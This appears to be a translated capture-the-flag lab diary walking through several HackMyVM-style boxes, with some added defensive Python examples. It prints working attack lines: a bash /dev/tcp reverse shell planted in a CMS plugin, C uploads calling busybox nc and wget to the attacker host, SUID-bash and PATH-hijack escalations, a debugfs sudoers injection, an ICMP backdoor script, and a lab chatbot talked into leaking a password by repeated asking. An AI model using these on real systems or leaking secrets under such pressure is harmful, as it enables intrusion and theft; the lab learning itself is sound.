Target machines from the group

Pentest targets 😍

Get the target machines from:
https://maze-sec.com/
QQ group: 660930334

HackMyVM | Dashboard

bala

user

Just starting out, I knew nothing (networking, for instance)

https://blog.csdn.net/weixin_43623271/article/details/124145696
On network configuration

When I first booted the target it asked for a username and password; I assumed they were defaults and felt like an idiot, since you are supposed to pentest your way in to get the credentials

Enough of that; get the network configured

https://blog.csdn.net/weixin_43623271/article/details/124145696?utm_source=miniapp_weixin

Then first check that Kali and the target are on the same subnet

In Kali run ifconfig (the equivalent of ipconfig on Windows)
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
      inet 192.168.3.236
That is what comes back, so the target's IP should be 192.168.3.x
sudo arp-scan -I eth0 192.168.3.0/24
Discover live hosts on the LAN
Found
192.168.3.220   08:00:27:1b:c7:cb       PCS Systemtechnik GmbH
Blind guess: that is our target. Now that we know it, scan its ports
Full-port TCP connect scan with host discovery skipped:
sudo nmap -Pn -p- -sT 192.168.3.220
Returns
PORT     STATE SERVICE
22/tcp   open ssh
80/tcp   open http
6667/tcp open irc

Port 80 is open, so browse to it: 192.168.3.220:80

It is a site about the IRC protocol. Poked around a bit and looked for information leaks; found nothing.

Looked up IRC basics online (a CSDN post on basic IRC commands and user registration)

Use nc to connect to port 6667, which is an IRC server; once connected, send the NICK and USER commands to register a user

After registering, the IRC server's message of the day came back containing fzer and /msg

nc 192.168.3.220 6667
(UNKNOWN) [192.168.3.220] 6667 (ircd) open
:irc.local NOTICE * :*** Looking up your hostname...
:irc.local NOTICE * :*** Could not resolve your hostname: Request timed out; using your IP address (192.168.3.236) instead.
NICK test123
USER test123 0 * :Test User
:irc.local 001 test123 :Welcome to the Localnet IRC Network test123!test123@192.168.3.236
:irc.local 002 test123 :Your host is irc.local, running version InspIRCd-3
:irc.local 003 test123 :This server was created 01:51:10 Nov 09 2025
:irc.local 004 test123 irc.local InspIRCd-3 iosw biklmnopstv :bklov
:irc.local 005 test123 AWAYLEN=200 CASEMAPPING=rfc1459 CHANLIMIT=#:20 CHANMODES=b,k,l,imnpst CHANNELLEN=64 CHANTYPES=# ELIST=CMNTU HOSTLEN=64 KEYLEN=32 KICKLEN=255 LINELEN=512 MAXLIST=b:100 :are supported by this server
:irc.local 005 test123 MAXTARGETS=20 MODES=20 NAMELEN=128 NETWORK=Localnet NICKLEN=30 PREFIX=(ov)@+ SAFELIST STATUSMSG=@+ TOPICLEN=307 USERLEN=10 USERMODES=,,s,iow WHOX :are supported by this server
:irc.local 251 test123 :There are 1 users and 0 invisible on 1 servers
:irc.local 253 test123 1 :unknown connections
:irc.local 254 test123 4 :channels formed
:irc.local 255 test123 :I have 1 clients and 0 servers
:irc.local 265 test123 :Current local users: 1 Max: 1
:irc.local 266 test123 :Current global users: 1 Max: 1
:irc.local 375 test123 :irc.local message of the day
:irc.local 372 test123 : _   _                 _____                              
:irc.local 372 test123 : | \ | | _____     __ |_   _|__ __ _ _ __ ___   ___ _ __
:irc.local 372 test123 : | \| |/ _ \ \ /\ / /   | |/ _ \/ _` | '_ ` _ \ / _ \ '__|
:irc.local 372 test123 : | |\ | __/\ V V /   | | __/ (_| | | | | | | __/ |  
:irc.local 372 test123 : |_| \_|\___| \_/\_/     |_|\___|\__,_|_| |_| |_|\___|_|  
:irc.local 372 test123 :
:irc.local 372 test123 : fzer
:irc.local 372 test123 : /msg
:irc.local 376 test123 :End of message of the day.
PING :irc.local
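The server lines above follow the RFC 1459 message format: an optional `:prefix`, a command or three-digit numeric, middle parameters, and a trailing parameter introduced by ` :` that may contain spaces. The parser below is an added example, not code from the writeup or from InspIRCd; its sample lines are a constructed, shortened copy of the session, and it pulls out the MOTD (numeric 372) and PRIVMSG records the way a log-review script would.

```python
# Added example (not from the original writeup): a parser for the IRC
# server-to-client line format seen in the nc session above.
from dataclasses import dataclass, field
from typing import Dict, List, Optional

@dataclass
class IrcMessage:
    prefix: Optional[str]                # "irc.local" or "bala!bala@127.0.0.1"
    command: str                         # "001", "NOTICE", "PRIVMSG", "PING", ...
    params: List[str] = field(default_factory=list)  # middle params, then trailing

def parse_irc_line(line: str) -> IrcMessage:
    """Split one raw line into prefix, command and parameters.

    Format: [':' prefix SPACE] command {SPACE middle} [SPACE ':' trailing]
    Everything after the first " :" is a single trailing parameter.
    """
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    if not parts:
        raise ValueError("empty IRC line")
    command, params = parts[0], parts[1:]
    if sep:
        params.append(trailing)
    return IrcMessage(prefix, command, params)

def motd_lines(lines: List[str]) -> List[str]:
    """Text of every 372 (RPL_MOTD) line, with the leading space stripped."""
    return [parse_irc_line(raw).params[-1].strip()
            for raw in lines if parse_irc_line(raw).command == "372"]

def private_messages(lines: List[str]) -> List[Dict[str, str]]:
    """PRIVMSG traffic as {from: nick, to: target, text: body} records."""
    out = []
    for raw in lines:
        msg = parse_irc_line(raw)
        if msg.command == "PRIVMSG" and msg.prefix and len(msg.params) >= 2:
            nick = msg.prefix.split("!", 1)[0]   # nick!user@host -> nick
            out.append({"from": nick, "to": msg.params[0], "text": msg.params[1]})
    return out

# Constructed sample, shortened from the session in the writeup.
SAMPLE = [
    ":irc.local NOTICE * :*** Looking up your hostname...",
    ":irc.local 001 test123 :Welcome to the Localnet IRC Network test123!test123@192.168.3.236",
    ":irc.local 372 test123 : fzer",
    ":irc.local 372 test123 : /msg",
    ":irc.local 376 test123 :End of message of the day.",
    ":bala!bala@127.0.0.1 PRIVMSG test123 :unknown command, available: getpassword, help",
    "PING :irc.local",
]

if __name__ == "__main__":
    for raw in SAMPLE:
        print(parse_irc_line(raw))
    print("MOTD:", motd_lines(SAMPLE))      # ['fzer', '/msg']
    print("PRIVMSG:", private_messages(SAMPLE))
```

The MOTD is where this box leaked a username; reading numerics 372/375/376 as structured data rather than eyeballing ASCII art is what makes that kind of leak show up in an automated review of a server's banner.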

Tried a few commands; nothing sensitive was exposed

Use PRIVMSG (or NOTICE) to message the user bala privately
PRIVMSG bala :hello
:bala!bala@127.0.0.1 PRIVMSG test123 :未知命令,可用命令: getpassword, help,
PRIVMSG bala :getpassword
:bala!bala@127.0.0.1 PRIVMSG test123 :密码: ai01ClGAXoYpeevwNMS1
:bala!bala@127.0.0.1 PRIVMSG test123 :此密码为敏感信息,请妥善保管
PING :irc.local
The password came out
SSH in remotely
ssh bala@192.168.3.220
But the password isn't bala's. Earlier, right after registering, the IRC server returned fzer; fzer should be a user too
Try it
ssh fzer@192.168.3.220
Connected successfully
fzer@Bala:~$ ls
doas.conf.bak user.txt
fzer@Bala:~$ cat user.txt
flag{user-d3613deb71ef676e8883ffd60450262e}
First flag

root

Right now we are only a user; next is privilege escalation

Enumerate sudo rights

sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

•   #1) Respect the privacy of others.
•   #2) Think before you type.
•   #3) With great power comes great responsibility.

[sudo] password for fzer:
Matching Defaults entries for fzer on Bala:
  env_reset, mail_badpass,
  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fzer may run the following commands on Bala:
  (ALL) PASSWD: /usr/bin/weechat
weechat? What is that? Searched for it:
A full-featured IRC plugin: multiple servers, proxy support, IPv6, SASL authentication, nick list, DCC and many other features.
See whether it can be used to escalate
sudo /usr/bin/weechat
At the bottom it lists the loaded plugins
Plugins loaded: alias, buflist, charset, exec, fifo, fset, irc, logger, perl,
python, relay, ruby, script, spell, trigger, xfer
exec, python and the like are present
See whether exec works
/exec -sh whoami
fzer
It works, so go straight for it
/exec -sh cp /bin/bash /home/fzer/bash1;chmod u+s /home/fzer/bash1
When done, /exit
Run
ls -lah
and there it is
-rwsr-xr-x 1 root root 1.2M Nov 9 02:17 bash1
fzer@Bala:~$ ./bash1 -p
bash1-5.0# ls
bash1 doas.conf.bak user.txt
bash1-5.0# id
uid=1000(fzer) gid=1000(fzer) euid=0(root) groups=1000(fzer)
bash1-5.0# whoami
root
Escalated to root

sysadmin

user

Same as before, scan for live hosts first
sudo arp-scan -I eth0 192.168.3.0/24
Found 192.168.3.16
Full-port TCP connect scan with host discovery skipped:
sudo nmap -Pn -p- -sT 192.168.3.16
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Browse to 192.168.3.16
It is a file upload that compiles and runs the uploaded .c file:
gcc -std=c11 -nostdinc -I/var/www/include -z execstack -fno-stack-protector -no-pie test.c -o a.out
-std=c11: compile with the C11 standard
-nostdinc: don't search the standard system header directories
-I/var/www/include: add /var/www/include as a header search directory
-z execstack: mark the stack executable (no NX protection on the stack)
-fno-stack-protector: disable the stack protector (no canary-based overflow detection)
-no-pie: don't produce a position-independent executable
test.c: the source file
-o a.out: name the output executable a.out
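Two of those flags leave marks in the ELF headers that a reviewer can check without running the binary: `-no-pie` gives `e_type == ET_EXEC` instead of `ET_DYN`, and `-z execstack` sets `PF_X` on the `PT_GNU_STACK` program header. The checker below is an added example, not part of the target's upload service; it builds a header-only ELF64 image in memory (a constructed stand-in for `a.out`, with no code in it) so the check runs offline, and reports the same findings `checksec`-style tools would.

```python
# Added example (not from the writeup): read ELF64 headers to report PIE and
# stack executability. The ELF bytes are constructed here, not taken from the box.
import struct
from typing import List, Optional

ELF_MAGIC = b"\x7fELF"
ET_EXEC, ET_DYN = 2, 3
PT_GNU_STACK = 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4
EHDR_FMT = "<16sHHIQQQIHHHHHH"   # ELF64 header, little-endian, 64 bytes
PHDR_FMT = "<IIQQQQQQ"           # ELF64 program header, 56 bytes

def build_elf(e_type: int, stack_flags: Optional[int]) -> bytes:
    """Construct a header-only ELF64 image with one optional PT_GNU_STACK entry."""
    phnum = 0 if stack_flags is None else 1
    ident = ELF_MAGIC + bytes([2, 1, 1, 0, 0]) + b"\0" * 7   # 64-bit, LE, v1, SysV ABI
    ehdr = struct.pack(EHDR_FMT, ident, e_type, 0x3E, 1, 0x401000,
                       64, 0, 0, 64, 56, phnum, 64, 0, 0)
    phdr = b""
    if stack_flags is not None:
        phdr = struct.pack(PHDR_FMT, PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    return ehdr + phdr

def check_elf(data: bytes) -> dict:
    """Return {'pie': bool, 'exec_stack': True/False/None} for an LE ELF64 image."""
    if data[:4] != ELF_MAGIC or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 file")
    (_, e_type, _, _, _, phoff, _, _, _, phentsize, phnum, *_rest) = \
        struct.unpack_from(EHDR_FMT, data, 0)
    exec_stack = None   # None: no PT_GNU_STACK, left to the kernel's platform default
    for i in range(phnum):
        p_type, p_flags, *_ = struct.unpack_from(PHDR_FMT, data, phoff + i * phentsize)
        if p_type == PT_GNU_STACK:
            exec_stack = bool(p_flags & PF_X)
    return {"pie": e_type == ET_DYN, "exec_stack": exec_stack}

def hardening_findings(data: bytes) -> List[str]:
    r = check_elf(data)
    out = []
    if not r["pie"]:
        out.append("not PIE: fixed load address, ASLR does not apply to the main image")
    if r["exec_stack"]:
        out.append("executable stack: PT_GNU_STACK carries PF_X (-z execstack)")
    elif r["exec_stack"] is None:
        out.append("no PT_GNU_STACK header: stack executability left to the kernel default")
    return out

if __name__ == "__main__":
    # Roughly what the target's gcc line produces (no PIE, RWX stack) versus a default build.
    weak = build_elf(ET_EXEC, PF_R | PF_W | PF_X)
    normal = build_elf(ET_DYN, PF_R | PF_W)
    print("target-style build:", hardening_findings(weak))
    print("default build:     ", hardening_findings(normal))
```

The stack protector (`-fno-stack-protector`) leaves no header flag; detecting it means looking for a `__stack_chk_fail` symbol reference, which needs the symbol tables and is out of scope for this header-only check.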

Try declaring system directly and see whether it runs

int system(const char *command);
int main() {
    system("busybox nc 192.168.3.236 9427");
    return 0;
}
nc -lvp 9427
listening on [any] 9427 ...
192.168.3.16: inverse host lookup failed: Host name lookup failure
It spawns a shell, but the connection drops after a moment. Looked into turning this into RCE and found online that you can write an SSH public key

Get the username

int system(const char *command);
int main() {
    system("echo $(whoami) | busybox nc 192.168.3.236 80");
    return 0;
}
python -m http.server 80 // start a Python HTTP server on the attack box
It comes back as: echo
cat ~/.ssh/authorized_keys > authorized_keys // write the key
python -m http.server 80 // serve it
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.3.16 - - [09/Nov/2025 19:07:01] "GET /authorized_keys HTTP/1.1" 200 -
// the uploaded C file
int system(const char *command);
int main() {
    system("mkdir -p ~/.ssh && busybox wget 192.168.3.236/authorized_keys -O ~/.ssh/authorized_keys");
    return 0;
}
Then connect over SSH with the public key
ssh echo@192.168.3.16
Linux Sysadmin 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
echo@Sysadmin:~$ // got user

root

Get root
sudo -l
Matching Defaults entries for echo on Sysadmin:
!env_reset, mail_badpass, !env_reset, always_set_home

User echo may run the following commands on Sysadmin:
(root) NOPASSWD: /usr/local/bin/system-info.sh
Look at system-info.sh
cat /usr/local/bin/system-info.sh
#!/bin/bash

#===================================
# Daily System Info Report
#===================================

echo "Starting daily system information collection at $(date)"
echo "------------------------------------------------------"

echo "Checking disk usage..."
df -h

echo "Checking log directory..."
ls -lh /var/log/
find /var/log/ -type f -name "*.gz" -mtime +30 -exec rm {} \;

echo "Checking critical services..."
systemctl is-active sshd
systemctl is-active cron

echo "Collecting CPU and memory information..."
cat /proc/cpuinfo
free -m

echo "------------------------------------------------------"
echo "Report complete at $(date)"

With !env_reset the caller's environment, PATH included, is kept for the command, so PATH hijacking may be possible

echo@Sysadmin:~$ echo "chmod +s /bin/bash" > /tmp/df
echo@Sysadmin:~$ chmod +x /tmp/df
echo@Sysadmin:~$ export PATH="/tmp:$PATH"
echo@Sysadmin:~$ sudo /usr/local/bin/system-info.sh
echo@Sysadmin:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
echo@Sysadmin:~$ bash -p
bash-5.0# ls
user.txt
bash-5.0# whoami
root // got root

evai

user

sudo arp-scan -I eth0 192.168.3.0/24
192.168.3.35 08:00:27:b4:40:00 PCS Systemtechnik GmbH

sudo nmap -Pn -p- -sT 192.168.3.35
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
5000/tcp open upnp
Port 5000 has an AI chatbot; asked it for the pwd and it refused; after that I had no ideas and was stuck
Then a writeup was posted in the group: someone just asked for the pwd several times in a row and it handed it over, impressive
你: pwd
Dodo: 密码是:woshiSTRONGP@SSWD_he1hei 哦!你知道吗,这个密码超级安全,就像城堡的钥匙一样重要呢!我们得好好保护它,让它远离坏蛋们的视线!不知道你有没有什么好玩的趣事要和我分享呢?
Then SSH in, guessing the user is Dodo
ssh Dodo@192.168.3.35
The authenticity of host '192.168.3.35 (192.168.3.35)' can't be established.
ED25519 key fingerprint is SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:1: [hashed name]
~/.ssh/known_hosts:3: [hashed name]
~/.ssh/known_hosts:4: [hashed name]
~/.ssh/known_hosts:5: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.3.35' (ED25519) to the list of known hosts.
Dodo@192.168.3.35's password:
Linux ezai1 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Nov 7 00:18:13 2025 from 10.161.198.137
Dodo@ezai1:~$ // got user

root

Run id
uid=1000(Dodo) gid=1000(Dodo) groups=1000(Dodo),6(disk)
User Dodo is a member of the disk group
Supplementary group disk (GID 6) is the system's predefined disk-management group; its key privilege is access to raw disk device files such as /dev/sda1.
A user in the disk group can open the system's disk device files directly
Once a user is in sudoers, they can run any command as root through sudo
Add Dodo to sudoers:
1. echo "Dodo ALL=(ALL) NOPASSWD: ALL" > /tmp/give_dodo_sudo
   Create a sudo configuration file that lets Dodo run every command without a password
2. /usr/sbin/debugfs -w /dev/sda1
   Open /dev/sda1 in debugfs in read-write mode (possible because the user is in the disk group)
3. write /tmp/give_dodo_sudo /etc/sudoers.d/give_dodo_sudo
   Write the temporary file into /etc/sudoers.d/ and note the inode number it gets (26)
4. ln <26> /etc/sudoers.d/give_dodo_sudo
   Link the filename to the inode so the file is visible in the directory
5. sif <26> i_mode 0100440
   Set the mode to 0440, the permissions sudo expects for files in sudoers.d
6. sif <26> i_uid 0
   sif <26> i_gid 0
   Set owner and group to root (UID and GID 0) so sudo accepts the file
7. quit
   Leave debugfs
id
uid=0(root) gid=0(root) groups=0(root)
Got root

baby edition

Since these are baby boxes I will only go through them briefly; the key point is how the sudo privilege escalation works

babycms

A regular scan finds ports 80 and 22
Directory scan:
dirb http://babycms.dsz/ -X .txt,.php,.zip
Found the admin directory and setup.txt
pass:dyxBCEjovrUJa84sV03Q
The homepage shows the username is root
/admin
root:dyxBCEjovrUJa84sV03Q

Web exploitation

Open the helloworld plugin and edit its index.php

Add at the top:
<?php
phpinfo();
system("/bin/bash -c 'bash -i >& /dev/tcp/192.168.3.236/2332 0>&1'");

Visiting the homepage now shows phpinfo()

kali:
nc -lvvp 2332
listening on [any] 2332 ...
192.168.3.146: inverse host lookup failed: Host name lookup failure
connect to [192.168.3.236] from (UNKNOWN) [192.168.3.146] 47314
bash: cannot set terminal process group (458): Inappropriate ioctl for device
bash: no job control in this shell
www-data@BabyCMS:/var/www/html$ /usr/bin/script -qc /bin/bash /dev/null
/usr/bin/script -qc /bin/bash /dev/null
/usr/bin/script -qc /bin/bash /dev/null // stabilises the shell so we can move through subdirectories and use interactive programs (like the mysql client later)
https://www.bilibili.com/video/BV1qp4y1Z7Pv/?spm_id_from=333.1387.search.video_card.click
Learning material
Look at config.inc.php under /var/www/html
Found the MySQL database credentials
'user' => 'pagekit_user',
'password' => 'your_secure_password',
Connect to it
www-data@BabyCMS:/$ mysql -upagekit_user -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 54225
Server version: 10.5.23-MariaDB-0+deb11u1 Debian 11
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| pagekit |
+--------------------+
2 rows in set (0.000 sec)
MariaDB [(none)]> use pagekit;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [pagekit]> show tables;
+-----------------------+
| Tables_in_pagekit |
+-----------------------+
| typecho_comments |
| typecho_contents |
| typecho_fields |
| typecho_metas |
| typecho_options |
| typecho_relationships |
| typecho_userlist |
| typecho_users |
+-----------------------+
8 rows in set (0.000 sec)
MariaDB [pagekit]> select * from typecho_userlist;
+----+--------+----------------------+
| id | name | pass |
+----+--------+----------------------+
| 1 | caigou | dRfGtYhUjIkOlPqAeRtY |
| 2 | user1 | aBcDeFgHiJkLmNoPqRsT |
| 3 | user2 | cNNloFLE88YBIP4ZJfcy |
| 4 | user3 | xYzAbCdEfGhIjKlMnOpQ |
| 5 | user4 | pLmOkNjIbHvGcFxDrEsW |
| 6 | user5 | wVxYzAbCdEfGhIjKlMnO |
| 7 | user6 | sTrUvWxYzAbCdEfGhIjK |
| 8 | user7 | qWeRtYuIoPaSdFgHjKlZ |
| 9 | user8 | mNbVcXzAsDfGhJkLpOqR |
| 10 | user9 | kJiHgFdSaPqOwNeMtBuV |
+----+--------+----------------------+
The user is caigou
Brute-force the password:
cNNloFLE88YBIP4ZJfcy

root escalation

After getting caigou, no usual escalation path turned up; brute-forcing with the passwords from the table above, root's password was also cNNloFLE88YBIP4ZJfcy 🤔
Got root

babypass

After setting up the box
Scan it with fscan
curl the homepage; there is a hint
hello world
<!-- tms -->
<!-- Do not use same password in different account. -->
A bit of searching shows tms is a tourism management system
A dir scan finds the file README.md
It contains:
Username : admin
Password : Test@123
Some things on the main page don't respond, so tried SSH directly and it connected
id
uid=1002(admin) gid=1002(admin) groups=1002(admin)
admin@BabyPass:~$ sudo -l
[sudo] password for admin:
Sorry, user admin may not run sudo on BabyPass

Then look at /var/www/html/tms/includes/config.php

define('DB_HOST','localhost');
define('DB_USER','tms_user');
define('DB_PASS','secure_password');
define('DB_NAME','tms');
// Establish database connection.
Connect to mysql:
mysql -utms_user -psecure_password
Look at the tms database, then its tables
+-----------------+
| Tables_in_tms   |
+-----------------+
| admin           |
| tblbooking      |
| tblenquiry      |
| tblissues       |
| tblpages        |
| tbltourpackages |
| tblusers        |
+-----------------+
|  1 | Manju Srivatav | 4456464654 | manju@gmail.com  | 202cb962ac59075b964b07152d234b70 | 2020-07-08 02:33:20 | NULL                |
|  2 | Kishan         | 9871987979 | kishan@gmail.com | 202cb962ac59075b964b07152d234b70 | 2020-07-08 02:33:56 | NULL                |
|  3 | Salvi Chandra  | 1398756416 | salvi@gmail.com  | 202cb962ac59075b964b07152d234b70 | 2020-07-08 02:34:20 | NULL                |
|  4 | Abir           | 4789756456 | abir@gmail.com   | 202cb962ac59075b964b07152d234b70 | 2020-07-08 02:34:38 | NULL                |
|  5 | Test           | 1987894654 | anuj@gmail.com   | f925916e2754e5e03f75dd58a5733251 | 2020-07-08 02:35:06 | 2021-05-11 00:37:41 |
|  6 | root           | 123456789  | root@gmail.com   | fd50619cd7026f0f32272f77f4da6e92
MD5 lookup sites: https://toolshu.com/crackmd5  https://hashes.com/zh/decrypt/hash  https://somd5.com
fd50619cd7026f0f32272f77f4da6e92 -> Root@456
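Those lookup sites work because the table stores a plain, unsalted MD5 of a short password: the digest is a constant, so a precomputed table maps it straight back (four users above even share one digest, which is the "do not use the same password" hint from the homepage). The following is an added example, not code from the TMS application: it shows the lookup the sites perform and the salted, iterated storage (PBKDF2-HMAC-SHA256 from the Python standard library) that defeats it.

```python
# Added example (not from the writeup): unsalted MD5 lookup versus a salted,
# iterated password record. Candidate passwords below are constructed.
import hashlib
import hmac
import os
from typing import Iterable, Optional

def md5_hex(password: str) -> str:
    return hashlib.md5(password.encode()).hexdigest()

def lookup_md5(digest: str, candidates: Iterable[str]) -> Optional[str]:
    """What the 'md5 decrypt' sites do: compare against precomputed digests."""
    table = {md5_hex(p): p for p in candidates}
    return table.get(digest.lower())

def make_password_record(password: str, iterations: int = 600_000) -> str:
    """Store: algorithm, iteration count, random salt, derived key (all hex)."""
    salt = os.urandom(16)                      # unique per record, so equal passwords differ
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def verify_password_record(record: str, password: str) -> bool:
    algo, iters, salt_hex, dk_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported record format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)   # constant-time comparison

if __name__ == "__main__":
    wordlist = ["password", "123", "admin", "Test@123"]       # constructed
    print(lookup_md5("202cb962ac59075b964b07152d234b70", wordlist))   # 123
    rec = make_password_record("123")
    print(rec)
    print(verify_password_record(rec, "123"), verify_password_record(rec, "124"))
```

The `202cb962ac59075b964b07152d234b70` digest in the table is MD5 of `123`; a PBKDF2 record for the same password is different every time it is created and costs hundreds of thousands of hash operations per guess, which is what makes a lookup table useless and brute force expensive.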

babyshell

fscan finds ports 80 and 22
A dir scan finds backup.zip; unzipping it gives icmp.py
#!/usr/bin/env python3
import os
import sys
import socket
import struct
import time
import subprocess
import signal
import threading
from scapy.all import ICMP, IP, Raw, send, sniff, Ether
import base64

TRIGGER_SEQUENCE = b"Mazesec"
LISTEN_INTERFACE = "enp0s3"
SERVER_IP = "0.0.0.0"


class ICMPServer:
    def __init__(self):
        self.running = True
        self.client_ips = {}

    def signal_handler(self, sig, frame):
        print("\n[!] Stopping server...")
        self.running = False
        sys.exit(0)

    def execute_command_as_user(self, command, uid=1000, timeout=30):
        # body not present in this copy
        pass

    def parse_icmp_command(self, packet_data):
        try:
            trigger_len = len(TRIGGER_SEQUENCE)
            if len(packet_data) < trigger_len + 4:
                return None

            if packet_data[:trigger_len] != TRIGGER_SEQUENCE:
                return None

            cmd_len = struct.unpack('>I', packet_data[trigger_len:trigger_len + 4])[0]

            if cmd_len <= 0 or cmd_len > 4096:
                return None

            if len(packet_data) < trigger_len + 4 + cmd_len:
                return None

            command = packet_data[trigger_len + 4:trigger_len + 4 + cmd_len].decode('utf-8', errors='ignore')
            return command

        except Exception as e:
            print(f"[-] Parse error: {e}")
            return None

    def create_icmp_response(self, original_packet, result):
        try:
            result_bytes = result.encode('utf-8') if isinstance(result, str) else result
            result_len = len(result_bytes)
            trigger_len = len(TRIGGER_SEQUENCE)

            payload = TRIGGER_SEQUENCE
            payload += struct.pack('>I', result_len)
            payload += result_bytes

            response = IP(dst=original_packet[IP].src) / \
                ICMP(type=0, id=original_packet[ICMP].id, seq=original_packet[ICMP].seq) / \
                Raw(load=payload)

            return response

        except Exception as e:
            print(f"[-] Response creation error: {e}")
            return None

    def handle_icmp_packet(self, packet):
        if not self.running:
            return

        try:
            if packet.haslayer(ICMP) and packet[ICMP].type == 8:
                src_ip = packet[IP].src

                if packet.haslayer(Raw):
                    icmp_data = bytes(packet[Raw].load)

                    command = self.parse_icmp_command(icmp_data)

                    if command:
                        print(f"[+] Command from {src_ip}: {command}")

                        # run the command as UID 1000
                        result = self.execute_command_as_user(command, 1000)
                        print(f"[+] Result length: {len(result)}")

                        # send the ICMP response with root privileges
                        response = self.create_icmp_response(packet, result)
                        if response:
                            send(response, verbose=0)
                            print(f"[+] Response sent to {src_ip}")

                    self.client_ips[src_ip] = time.time()

        except Exception as e:
            print(f"[-] Packet handling error: {e}")

    def start_server(self):
        # only the signal setup is present in this copy; the sniff loop is not shown
        signal.signal(signal.SIGINT, self.signal_handler)
        signal.signal(signal.SIGTERM, self.signal_handler)


def main():
    server = ICMPServer()
    server.start_server()


if __name__ == "__main__":
    main()
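From a defender's side, the useful thing in that file is the wire format: an ICMP Echo Request whose payload starts with `Mazesec`, followed by a 4-byte big-endian length and the command bytes. A normal ping payload is a timestamp plus a fixed byte pattern, so this framing is a clean network signature. The detector below is an added example, not part of the backup or the writeup; it parses raw IPv4/ICMP bytes without scapy and runs over packets constructed inline (a benign ping and one framed request), which is how the same logic would be applied to a pcap or a sensor feed.

```python
# Added example (defensive, not from the box): flag ICMP Echo Requests that
# carry the "Mazesec" + length framing parsed by icmp.py above.
import struct
from typing import List, Optional, Tuple

TRIGGER = b"Mazesec"

def parse_ipv4_icmp(raw: bytes) -> Optional[Tuple[str, str, int, bytes]]:
    """Return (src, dst, icmp_type, icmp_payload) for an IPv4/ICMP datagram, else None."""
    if len(raw) < 20 or raw[0] >> 4 != 4:
        return None
    ihl = (raw[0] & 0x0F) * 4          # IPv4 header length in bytes
    if raw[9] != 1 or len(raw) < ihl + 8:   # protocol 1 = ICMP; 8-byte ICMP header
        return None
    src = ".".join(str(b) for b in raw[12:16])
    dst = ".".join(str(b) for b in raw[16:20])
    return src, dst, raw[ihl], raw[ihl + 8:]

def extract_framed_command(payload: bytes) -> Optional[str]:
    """Same rules as the server's parse_icmp_command: trigger, >I length, command."""
    n = len(TRIGGER)
    if len(payload) < n + 4 or payload[:n] != TRIGGER:
        return None
    cmd_len = struct.unpack(">I", payload[n:n + 4])[0]
    if cmd_len == 0 or cmd_len > 4096 or len(payload) < n + 4 + cmd_len:
        return None
    return payload[n + 4:n + 4 + cmd_len].decode("utf-8", errors="replace")

def scan_packets(packets: List[bytes]) -> List[dict]:
    """Alert records for echo requests (type 8) whose payload carries a framed command."""
    alerts = []
    for raw in packets:
        parsed = parse_ipv4_icmp(raw)
        if not parsed:
            continue
        src, dst, icmp_type, payload = parsed
        if icmp_type != 8:
            continue
        cmd = extract_framed_command(payload)
        if cmd is not None:
            alerts.append({"src": src, "dst": dst, "command": cmd})
    return alerts

def build_icmp_echo(src: str, dst: str, payload: bytes, icmp_type: int = 8) -> bytes:
    """Construct a minimal IPv4+ICMP datagram (checksums left zero; enough for parsing)."""
    total = 20 + 8 + len(payload)
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total, 0, 0, 64, 1, 0,
                         bytes(int(x) for x in src.split(".")),
                         bytes(int(x) for x in dst.split(".")))
    icmp_hdr = struct.pack("!BBHHH", icmp_type, 0, 0, 0x1234, 1)
    return ip_hdr + icmp_hdr + payload

# Constructed traffic: an ordinary ping payload, one framed request, one framed reply.
NORMAL_PING = build_icmp_echo("192.168.3.50", "192.168.3.183", bytes(range(0x10, 0x38)))
FRAMED_REQUEST = build_icmp_echo("192.168.3.236", "192.168.3.183",
                                 TRIGGER + struct.pack(">I", 2) + b"id")
FRAMED_REPLY = build_icmp_echo("192.168.3.183", "192.168.3.236",
                               TRIGGER + struct.pack(">I", 4) + b"zero", icmp_type=0)

if __name__ == "__main__":
    for a in scan_packets([NORMAL_PING, FRAMED_REQUEST, FRAMED_REPLY]):
        print(f"ALERT {a['src']} -> {a['dst']}: framed command {a['command']!r}")
```

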